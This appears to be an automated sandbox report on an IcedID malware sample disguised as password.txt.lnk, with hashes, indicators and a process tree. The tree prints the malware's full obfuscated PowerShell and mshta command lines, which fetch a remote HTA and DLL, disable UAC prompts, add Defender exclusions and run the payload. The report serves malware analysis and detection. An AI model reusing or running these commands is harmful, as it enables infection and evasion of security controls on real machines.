Analysis
-
max time kernel
67s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-06-2022 16:06
Static task
static1
Behavioral task
behavioral1
Sample
password.txt.lnk
Resource
win7-20220414-en
General
-
Target
password.txt.lnk
-
Size
1KB
-
MD5
ee5dc8a66298685a6f6790e32e1a006b
-
SHA1
8bd4a8e15b8c097283b67dd8201ed41e01cbe794
-
SHA256
65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
-
SHA512
8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted
https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted
icedid
3289900935
ilzenhwery.com
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 6 3192 mshta.exe 8 3192 mshta.exe 10 3192 mshta.exe 16 4176 powershell.exe 23 3656 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3656 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exerundll32.exepid process 3076 powershell.exe 3076 powershell.exe 4176 powershell.exe 4176 powershell.exe 3656 rundll32.exe 3656 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 4176 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 5076 wrote to memory of 3076 5076 cmd.exe powershell.exe PID 5076 wrote to memory of 3076 5076 cmd.exe powershell.exe PID 3076 wrote to memory of 3192 3076 powershell.exe mshta.exe PID 3076 wrote to memory of 3192 3076 powershell.exe mshta.exe PID 3192 wrote to memory of 4176 3192 mshta.exe powershell.exe PID 3192 wrote to memory of 4176 3192 mshta.exe powershell.exe PID 4176 wrote to memory of 3656 4176 powershell.exe rundll32.exe PID 4176 wrote to memory of 3656 4176 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac4⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58b591dabf3d165412ca5160b0fc9f7a0
SHA17f4003f64d280a98099a799b7303ab94adfea747
SHA256d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60
SHA51257aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/3076-131-0x00000183A5BF0000-0x00000183A5C12000-memory.dmpFilesize
136KB
-
memory/3076-132-0x00007FFE19500000-0x00007FFE19FC1000-memory.dmpFilesize
10.8MB
-
memory/3076-130-0x0000000000000000-mapping.dmp
-
memory/3076-134-0x00007FFE19500000-0x00007FFE19FC1000-memory.dmpFilesize
10.8MB
-
memory/3192-133-0x0000000000000000-mapping.dmp
-
memory/3656-140-0x0000000000000000-mapping.dmp
-
memory/3656-144-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/4176-139-0x00007FFE18250000-0x00007FFE18D11000-memory.dmpFilesize
10.8MB
-
memory/4176-136-0x0000000000000000-mapping.dmp
-
memory/4176-143-0x00007FFE18250000-0x00007FFE18D11000-memory.dmpFilesize
10.8MB